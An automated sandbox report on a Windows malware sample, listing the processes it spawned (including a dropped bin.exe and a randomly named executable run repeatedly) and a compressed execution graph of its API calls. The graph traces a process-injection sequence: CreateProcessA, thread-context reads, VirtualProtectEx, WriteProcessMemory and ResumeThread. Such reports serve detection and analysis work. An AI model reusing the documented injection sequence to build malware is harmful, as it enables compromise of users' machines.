                                                                                                                                                                                        MD5 hash:EA8543BCC2E4689874647E2507DA6B29
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                        Start time:21:31:10
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                        Start time:21:31:17
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:21:31:18
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff7d45b0000
                                                                                                                                                                                        File size:2'378'752 bytes
                                                                                                                                                                                        MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:21:31:18
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\F90F00A9\bin.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                                        MD5 hash:EA8543BCC2E4689874647E2507DA6B29
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:21:31:18
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:21:31:19
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                                                        Imagebase:0x7ff794e20000
                                                                                                                                                                                        File size:19'232 bytes
                                                                                                                                                                                        MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                        Start time:21:31:20
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                        Start time:21:31:21
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                        Start time:21:31:21
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff7d5d50000
                                                                                                                                                                                        File size:78'456 bytes
                                                                                                                                                                                        MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                        Start time:21:31:23
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                                                                                                        Imagebase:0x7ff63cc40000
                                                                                                                                                                                        File size:19'456 bytes
                                                                                                                                                                                        MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                        Start time:21:31:23
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                        Start time:21:31:23
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                                        Imagebase:0x7ff614e70000
                                                                                                                                                                                        File size:98'104 bytes
                                                                                                                                                                                        MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                        Start time:21:31:29
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff69a060000
                                                                                                                                                                                        File size:57'856 bytes
                                                                                                                                                                                        MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                        Start time:21:31:29
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                        Start time:21:31:29
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                        Start time:21:31:30
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                        Start time:21:31:30
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                        Start time:21:31:31
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
                                                                                                                                                                                        Imagebase:0x7ff6ec4b0000
                                                                                                                                                                                        File size:19'776 bytes
                                                                                                                                                                                        MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                        Start time:21:31:32
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                        Start time:21:31:32
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                        Start time:21:31:32
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                        Start time:21:31:33
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                        Start time:21:31:33
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                        Start time:21:31:33
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                        Start time:21:31:33
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                        Start time:21:31:34
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                        Start time:21:31:34
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                        Start time:21:31:34
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                        Start time:21:31:34
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:9.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                          Signature Coverage:10.6%
                                                                                                                                                                                          Total number of Nodes:208
                                                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                                                          execution_graph 2984 401000 2985 40100c VirtualAlloc 2984->2985 2987 401073 2985->2987 3122 22638a7 3123 22638ac 3122->3123 3126 22638f2 3123->3126 3130 226260c 3126->3130 3131 226261a 3130->3131 3183 2262f63 3184 2262f68 3183->3184 3185 2262f6e lstrlen 3184->3185 3186 2262f85 3185->3186 2988 2260000 2990 2260005 2988->2990 3005 2260ce8 2990->3005 2992 2260011 3008 22633ca 2992->3008 2994 2260016 3012 226098b OpenMutexA 2994->3012 2997 226038f 2998 226002e 2998->2997 3001 2260697 2998->3001 3027 22606a0 2998->3027 3033 22606e6 3001->3033 3002 2260833 3003 22606dd 3003->3002 3037 2260835 3003->3037 3047 2260c63 GetPEB 3005->3047 3007 2260ced 3007->2992 3009 22633ea 3008->3009 3049 2263409 GetVolumeInformationA 3009->3049 3011 2263405 3011->2994 3013 226001b ExitProcess 3012->3013 3014 22609b3 GetStartupInfoA 3012->3014 3013->2998 3051 22609fd 3014->3051 3016 22609f6 3016->3013 3017 2260a02 CreateProcessA 3016->3017 3018 2260a12 Wow64GetThreadContext 3017->3018 3019 2260b10 3017->3019 3018->3019 3020 2260a3a VirtualProtectEx 3018->3020 3019->3013 3064 2260b17 3019->3064 3020->3019 3022 2260a65 DuplicateHandle 3020->3022 3022->3019 3023 2260aa6 WriteProcessMemory 3022->3023 3023->3019 3024 2260ad4 ResumeThread 3023->3024 3025 2260ae5 Sleep OpenMutexA 3024->3025 3025->3013 3026 2260b0b 3025->3026 3026->3019 3026->3025 3028 22606a5 3027->3028 3029 22606e6 3 API calls 3028->3029 3031 22606dd 3029->3031 3030 2260833 3030->3001 3031->3030 3032 2260835 3 API calls 3031->3032 3032->3030 3035 22606eb 3033->3035 3034 2260833 3034->3003 3035->3034 3036 2260835 3 API calls 3035->3036 3036->3034 3039 2260864 3037->3039 3038 2260887 3041 226088a 3038->3041 3042 2260ce8 GetPEB 3038->3042 3039->3038 3040 22608fd 3 API calls 3039->3040 3039->3041 3040->3038 3041->3002 3043 2260909 3042->3043 3044 2260667 3 API calls 3043->3044 3046 2260913 3044->3046 3045 2260962 3 API calls 3045->3046 3046->3045 3048 2260c6f 3047->3048 3048->3007 3048->3048 3050 226342b 3049->3050 3050->3011 3066 2263677 3051->3066 3053 2260a02 CreateProcessA 3054 2260a12 Wow64GetThreadContext 3053->3054 3055 2260b10 3053->3055 3054->3055 3056 2260a3a VirtualProtectEx 3054->3056 3057 2260b15 3055->3057 3058 2260b17 6 API calls 3055->3058 3056->3055 3059 2260a65 DuplicateHandle 3056->3059 3057->3016 3058->3057 3059->3055 3060 2260aa6 WriteProcessMemory 3059->3060 3060->3055 3061 2260ad4 ResumeThread 3060->3061 3062 2260ae5 Sleep OpenMutexA 3061->3062 3062->3057 3063 2260b0b 3062->3063 3063->3055 3063->3062 3068 2260b25 3064->3068 3067 2263689 3066->3067 3067->3053 3067->3067 3069 2260ce8 GetPEB 3068->3069 3070 2260b31 3069->3070 3075 2260b4b 3070->3075 3072 2260b44 3081 2260b89 3072->3081 3076 2263677 3075->3076 3077 2260b50 LoadLibraryA 3076->3077 3078 2260b66 3077->3078 3079 2260b89 5 API calls 3078->3079 3080 2260b7b 3078->3080 3079->3080 3080->3072 3083 2260b8e 3081->3083 3082 2260bd0 3091 22608d7 3082->3091 3083->3082 3084 2260ba1 OpenProcess 3083->3084 3084->3082 3088 2260bb2 3084->3088 3088->3082 3089 2260bc8 ExitProcess 3088->3089 3094 22608dd 3091->3094 3100 22608fd 3094->3100 3101 2260ce8 GetPEB 3100->3101 3102 2260909 3101->3102 3106 2260667 3102->3106 3104 2260913 3114 2260962 3104->3114 3107 226066a 3106->3107 3108 22606a0 3 API calls 3107->3108 3109 2260697 3108->3109 3110 22606e6 3 API calls 3109->3110 3112 22606dd 3110->3112 3111 2260833 3111->3104 3112->3111 3113 2260835 3 API calls 3112->3113 3113->3111 3115 2260ce8 GetPEB 3114->3115 3116 226096e 3115->3116 3117 2260978 Sleep RtlExitUserThread 3116->3117 3168 2264981 3169 2264994 3168->3169 3170 22649d2 CreateEventA 3169->3170 3171 2264a87 3169->3171 3172 22649f5 3170->3172 3172->3171 3173 2264d77 WaitForSingleObject 3172->3173 3173->3172 3174 2260b8f 3175 2260ba1 OpenProcess 3174->3175 3176 2260bd0 3175->3176 3179 2260bb2 3175->3179 3177 22608d7 3 API calls 3176->3177 3178 2260bd5 3177->3178 3180 2260c63 GetPEB 3178->3180 3179->3176 3181 2260bc8 ExitProcess 3179->3181 3182 2260bda 3180->3182 3182->3182 3132 2263f2c 3133 2263f31 3132->3133 3142 2263f5d 3132->3142 3134 2263f5f 3133->3134 3135 2263f4f GetModuleHandleA 3133->3135 3137 2263f6a Sleep 3134->3137 3143 226403f 3135->3143 3138 2263f9c 3137->3138 3139 2263f7a Sleep 3138->3139 3140 2263f9c 